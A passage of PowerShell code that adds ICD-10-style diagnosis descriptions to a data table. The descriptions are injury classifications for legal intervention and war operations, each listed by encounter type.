intervention involving unspecified explosives, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified explosives, law enforcement official injured","Legal intervention involving unspecified explosives, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified explosives, bystander injured","Legal intervention involving unspecified explosives, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified explosives, bystander injured","Legal intervention involving unspecified explosives, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified explosives, bystander injured","Legal intervention involving unspecified explosives, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified explosives, suspect injured","Legal intervention involving unspecified explosives, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified explosives, suspect injured","Legal intervention involving unspecified explosives, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified explosives, suspect injured","Legal intervention involving unspecified explosives, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by dynamite, law enforcement official injured","Legal intervention involving injury by dynamite, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by dynamite, law enforcement official injured","Legal intervention involving injury by dynamite, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by dynamite, law enforcement official injured","Legal intervention involving injury by dynamite, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by dynamite, bystander injured","Legal intervention involving injury by dynamite, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by dynamite, bystander injured","Legal intervention involving injury by dynamite, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by dynamite, bystander injured","Legal intervention involving injury by dynamite, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by dynamite, suspect injured","Legal intervention involving injury by dynamite, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by dynamite, suspect injured","Legal intervention involving injury by dynamite, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by dynamite, suspect injured","Legal intervention involving injury by dynamite, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by explosive shell, law enforcement official injured","Legal intervention involving injury by explosive shell, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by explosive shell, law enforcement official injured","Legal intervention involving injury by explosive shell, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by explosive shell, law enforcement official injured","Legal intervention involving injury by explosive shell, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by explosive shell, bystander injured","Legal intervention involving injury by explosive shell, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by explosive shell, bystander injured","Legal intervention involving injury by explosive shell, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by explosive shell, bystander injured","Legal intervention involving injury by explosive shell, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by explosive shell, suspect injured","Legal intervention involving injury by explosive shell, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by explosive shell, suspect injured","Legal intervention involving injury by explosive shell, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by explosive shell, suspect injured","Legal intervention involving injury by explosive shell, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other explosives, law enforcement official injured","Legal intervention involving other explosives, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other explosives, law enforcement official injured","Legal intervention involving other explosives, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other explosives, law enforcement official injured","Legal intervention involving other explosives, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other explosives, bystander injured","Legal intervention involving other explosives, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other explosives, bystander injured","Legal intervention involving other explosives, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other explosives, bystander injured","Legal intervention involving other explosives, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other explosives, suspect injured","Legal intervention involving other explosives, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other explosives, suspect injured","Legal intervention involving other explosives, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other explosives, suspect injured","Legal intervention involving other explosives, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified gas, law enforcement official injured","Legal intervention involving unspecified gas, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified gas, law enforcement official injured","Legal intervention involving unspecified gas, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified gas, law enforcement official injured","Legal intervention involving unspecified gas, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified gas, bystander injured","Legal intervention involving unspecified gas, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified gas, bystander injured","Legal intervention involving unspecified gas, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified gas, bystander injured","Legal intervention involving unspecified gas, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified gas, suspect injured","Legal intervention involving unspecified gas, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified gas, suspect injured","Legal intervention involving unspecified gas, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified gas, suspect injured","Legal intervention involving unspecified gas, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by tear gas, law enforcement official injured","Legal intervention involving injury by tear gas, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by tear gas, law enforcement official injured","Legal intervention involving injury by tear gas, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by tear gas, law enforcement official injured","Legal intervention involving injury by tear gas, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by tear gas, bystander injured","Legal intervention involving injury by tear gas, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by tear gas, bystander injured","Legal intervention involving injury by tear gas, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by tear gas, bystander injured","Legal intervention involving injury by tear gas, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by tear gas, suspect injured","Legal intervention involving injury by tear gas, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by tear gas, suspect injured","Legal intervention involving injury by tear gas, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by tear gas, suspect injured","Legal intervention involving injury by tear gas, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other gas, law enforcement official injured","Legal intervention involving other gas, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other gas, law enforcement official injured","Legal intervention involving other gas, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other gas, law enforcement official injured","Legal intervention involving other gas, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other gas, bystander injured","Legal intervention involving other gas, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other gas, bystander injured","Legal intervention involving other gas, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other gas, bystander injured","Legal intervention involving other gas, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other gas, suspect injured","Legal intervention involving other gas, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other gas, suspect injured","Legal intervention involving other gas, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other gas, suspect injured","Legal intervention involving other gas, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified blunt objects, law enforcement official injured","Legal intervention involving unspecified blunt objects, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified blunt objects, law enforcement official injured","Legal intervention involving unspecified blunt objects, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified blunt objects, law enforcement official injured","Legal intervention involving unspecified blunt objects, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified blunt objects, bystander injured","Legal intervention involving unspecified blunt objects, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified blunt objects, bystander injured","Legal intervention involving unspecified blunt objects, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified blunt objects, bystander injured","Legal intervention involving unspecified blunt objects, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified blunt objects, suspect injured","Legal intervention involving unspecified blunt objects, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified blunt objects, suspect injured","Legal intervention involving unspecified blunt objects, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified blunt objects, suspect injured","Legal intervention involving unspecified blunt objects, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving baton, law enforcement official injured","Legal intervention involving baton, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving baton, law enforcement official injured","Legal intervention involving baton, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving baton, law enforcement official injured","Legal intervention involving baton, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving baton, bystander injured","Legal intervention involving baton, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving baton, bystander injured","Legal intervention involving baton, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving baton, bystander injured","Legal intervention involving baton, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving baton, suspect injured","Legal intervention involving baton, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving baton, suspect injured","Legal intervention involving baton, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving baton, suspect injured","Legal intervention involving baton, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other blunt objects, law enforcement official injured","Legal intervention involving other blunt objects, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other blunt objects, law enforcement official injured","Legal intervention involving other blunt objects, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other blunt objects, law enforcement official injured","Legal intervention involving other blunt objects, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other blunt objects, bystander injured","Legal intervention involving other blunt objects, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other blunt objects, bystander injured","Legal intervention involving other blunt objects, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other blunt objects, bystander injured","Legal intervention involving other blunt objects, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other blunt objects, suspect injured","Legal intervention involving other blunt objects, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other blunt objects, suspect injured","Legal intervention involving other blunt objects, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other blunt objects, suspect injured","Legal intervention involving other blunt objects, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified sharp objects, law enforcement official injured","Legal intervention involving unspecified sharp objects, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified sharp objects, law enforcement official injured","Legal intervention involving unspecified sharp objects, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified sharp objects, law enforcement official injured","Legal intervention involving unspecified sharp objects, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified sharp objects, bystander injured","Legal intervention involving unspecified sharp objects, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified sharp objects, bystander injured","Legal intervention involving unspecified sharp objects, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified sharp objects, bystander injured","Legal intervention involving unspecified sharp objects, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified sharp objects, suspect injured","Legal intervention involving unspecified sharp objects, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified sharp objects, suspect injured","Legal intervention involving unspecified sharp objects, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified sharp objects, suspect injured","Legal intervention involving unspecified sharp objects, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving bayonet, law enforcement official injured","Legal intervention involving bayonet, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving bayonet, law enforcement official injured","Legal intervention involving bayonet, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving bayonet, law enforcement official injured","Legal intervention involving bayonet, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving bayonet, bystander injured","Legal intervention involving bayonet, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving bayonet, bystander injured","Legal intervention involving bayonet, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving bayonet, bystander injured","Legal intervention involving bayonet, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving bayonet, suspect injured","Legal intervention involving bayonet, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving bayonet, suspect injured","Legal intervention involving bayonet, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving bayonet, suspect injured","Legal intervention involving bayonet, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other sharp objects, law enforcement official injured","Legal intervention involving other sharp objects, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other sharp objects, law enforcement official injured","Legal intervention involving other sharp objects, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other sharp objects, law enforcement official injured","Legal intervention involving other sharp objects, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other sharp objects, bystander injured","Legal intervention involving other sharp objects, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other sharp objects, bystander injured","Legal intervention involving other sharp objects, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other sharp objects, bystander injured","Legal intervention involving other sharp objects, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other sharp objects, suspect injured","Legal intervention involving other sharp objects, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other sharp objects, suspect injured","Legal intervention involving other sharp objects, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other sharp objects, suspect injured","Legal intervention involving other sharp objects, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving manhandling, law enforcement official injured","Legal intervention involving manhandling, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving manhandling, law enforcement official injured","Legal intervention involving manhandling, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving manhandling, law enforcement official injured","Legal intervention involving manhandling, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving manhandling, bystander injured","Legal intervention involving manhandling, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving manhandling, bystander injured","Legal intervention involving manhandling, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving manhandling, bystander injured","Legal intervention involving manhandling, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving manhandling, suspect injured","Legal intervention involving manhandling, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving manhandling, suspect injured","Legal intervention involving manhandling, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving manhandling, suspect injured","Legal intervention involving manhandling, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other specified means, law enforcement official injured","Legal intervention involving other specified means, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other specified means, law enforcement official injured","Legal intervention involving other specified means, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other specified means, law enforcement official injured","Legal intervention involving other specified means, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other specified means, bystander injured","Legal intervention involving other specified means, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other specified means, bystander injured","Legal intervention involving other specified means, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other specified means, bystander injured","Legal intervention involving other specified means, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other specified means, suspect injured","Legal intervention involving other specified means, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other specified means, suspect injured","Legal intervention involving other specified means, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other specified means, suspect injured","Legal intervention involving other specified means, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention, means unspecified, law enforcement official injured","Legal intervention, means unspecified, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention, means unspecified, law enforcement official injured","Legal intervention, means unspecified, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention, means unspecified, law enforcement official injured","Legal intervention, means unspecified, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention, means unspecified, bystander injured","Legal intervention, means unspecified, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention, means unspecified, bystander injured","Legal intervention, means unspecified, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention, means unspecified, bystander injured","Legal intervention, means unspecified, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention, means unspecified, suspect injured","Legal intervention, means unspecified, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention, means unspecified, suspect injured","Legal intervention, means unspecified, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention, means unspecified, suspect injured","Legal intervention, means unspecified, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of unspecified marine weapon, military personnel","War operations involving explosion of unspecified marine weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of unspecified marine weapon, military personnel","War operations involving explosion of unspecified marine weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of unspecified marine weapon, military personnel","War operations involving explosion of unspecified marine weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of unspecified marine weapon, civilian","War operations involving explosion of unspecified marine weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of unspecified marine weapon, civilian","War operations involving explosion of unspecified marine weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of unspecified marine weapon, civilian","War operations involving explosion of unspecified marine weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of depth-charge, military personnel","War operations involving explosion of depth-charge, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of depth-charge, military personnel","War operations involving explosion of depth-charge, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of depth-charge, military personnel","War operations involving explosion of depth-charge, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of depth-charge, civilian","War operations involving explosion of depth-charge, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of depth-charge, civilian","War operations involving explosion of depth-charge, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of depth-charge, civilian","War operations involving explosion of depth-charge, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of marine mine, military personnel","War operations involving explosion of marine mine, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of marine mine, military personnel","War operations involving explosion of marine mine, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of marine mine, military personnel","War operations involving explosion of marine mine, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of marine mine, civilian","War operations involving explosion of marine mine, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of marine mine, civilian","War operations involving explosion of marine mine, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of marine mine, civilian","War operations involving explosion of marine mine, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of sea-based artillery shell, military personnel","War operations involving explosion of sea-based artillery shell, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of sea-based artillery shell, military personnel","War operations involving explosion of sea-based artillery shell, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of sea-based artillery shell, military personnel","War operations involving explosion of sea-based artillery shell, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of sea-based artillery shell, civilian","War operations involving explosion of sea-based artillery shell, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of sea-based artillery shell, civilian","War operations involving explosion of sea-based artillery shell, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of sea-based artillery shell, civilian","War operations involving explosion of sea-based artillery shell, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of torpedo, military personnel","War operations involving explosion of torpedo, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of torpedo, military personnel","War operations involving explosion of torpedo, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of torpedo, military personnel","War operations involving explosion of torpedo, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of torpedo, civilian","War operations involving explosion of torpedo, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of torpedo, civilian","War operations involving explosion of torpedo, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of torpedo, civilian","War operations involving explosion of torpedo, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving accidental detonation of onboard marine weapons, military personnel","War operations involving accidental detonation of onboard marine weapons, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving accidental detonation of onboard marine weapons, military personnel","War operations involving accidental detonation of onboard marine weapons, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving accidental detonation of onboard marine weapons, military personnel","War operations involving accidental detonation of onboard marine weapons, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving accidental detonation of onboard marine weapons, civilian","War operations involving accidental detonation of onboard marine weapons, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving accidental detonation of onboard marine weapons, civilian","War operations involving accidental detonation of onboard marine weapons, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving accidental detonation of onboard marine weapons, civilian","War operations involving accidental detonation of onboard marine weapons, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of other marine weapons, military personnel","War operations involving explosion of other marine weapons, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of other marine weapons, military personnel","War operations involving explosion of other marine weapons, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of other marine weapons, military personnel","War operations involving explosion of other marine weapons, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of other marine weapons, civilian","War operations involving explosion of other marine weapons, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of other marine weapons, civilian","War operations involving explosion of other marine weapons, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving explosion of other marine weapons, civilian","War operations involving explosion of other marine weapons, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified destruction of aircraft, military personnel","War operations involving unspecified destruction of aircraft, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified destruction of aircraft, military personnel","War operations involving unspecified destruction of aircraft, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified destruction of aircraft, military personnel","War operations involving unspecified destruction of aircraft, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified destruction of aircraft, civilian","War operations involving unspecified destruction of aircraft, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified destruction of aircraft, civilian","War operations involving unspecified destruction of aircraft, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified destruction of aircraft, civilian","War operations involving unspecified destruction of aircraft, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to enemy fire or explosives, military personnel","War operations involving destruction of aircraft due to enemy fire or explosives, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to enemy fire or explosives, military personnel","War operations involving destruction of aircraft due to enemy fire or explosives, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to enemy fire or explosives, military personnel","War operations involving destruction of aircraft due to enemy fire or explosives, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to enemy fire or explosives, civilian","War operations involving destruction of aircraft due to enemy fire or explosives, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to enemy fire or explosives, civilian","War operations involving destruction of aircraft due to enemy fire or explosives, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to enemy fire or explosives, civilian","War operations involving destruction of aircraft due to enemy fire or explosives, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to collision with other aircraft, military personnel","War operations involving destruction of aircraft due to collision with other aircraft, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to collision with other aircraft, military personnel","War operations involving destruction of aircraft due to collision with other aircraft, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to collision with other aircraft, military personnel","War operations involving destruction of aircraft due to collision with other aircraft, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to collision with other aircraft, civilian","War operations involving destruction of aircraft due to collision with other aircraft, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to collision with other aircraft, civilian","War operations involving destruction of aircraft due to collision with other aircraft, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to collision with other aircraft, civilian","War operations involving destruction of aircraft due to collision with other aircraft, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to onboard fire, military personnel","War operations involving destruction of aircraft due to onboard fire, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to onboard fire, military personnel","War operations involving destruction of aircraft due to onboard fire, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to onboard fire, military personnel","War operations involving destruction of aircraft due to onboard fire, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to onboard fire, civilian","War operations involving destruction of aircraft due to onboard fire, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to onboard fire, civilian","War operations involving destruction of aircraft due to onboard fire, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to onboard fire, civilian","War operations involving destruction of aircraft due to onboard fire, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel","War operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel","War operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel","War operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian","War operations involving 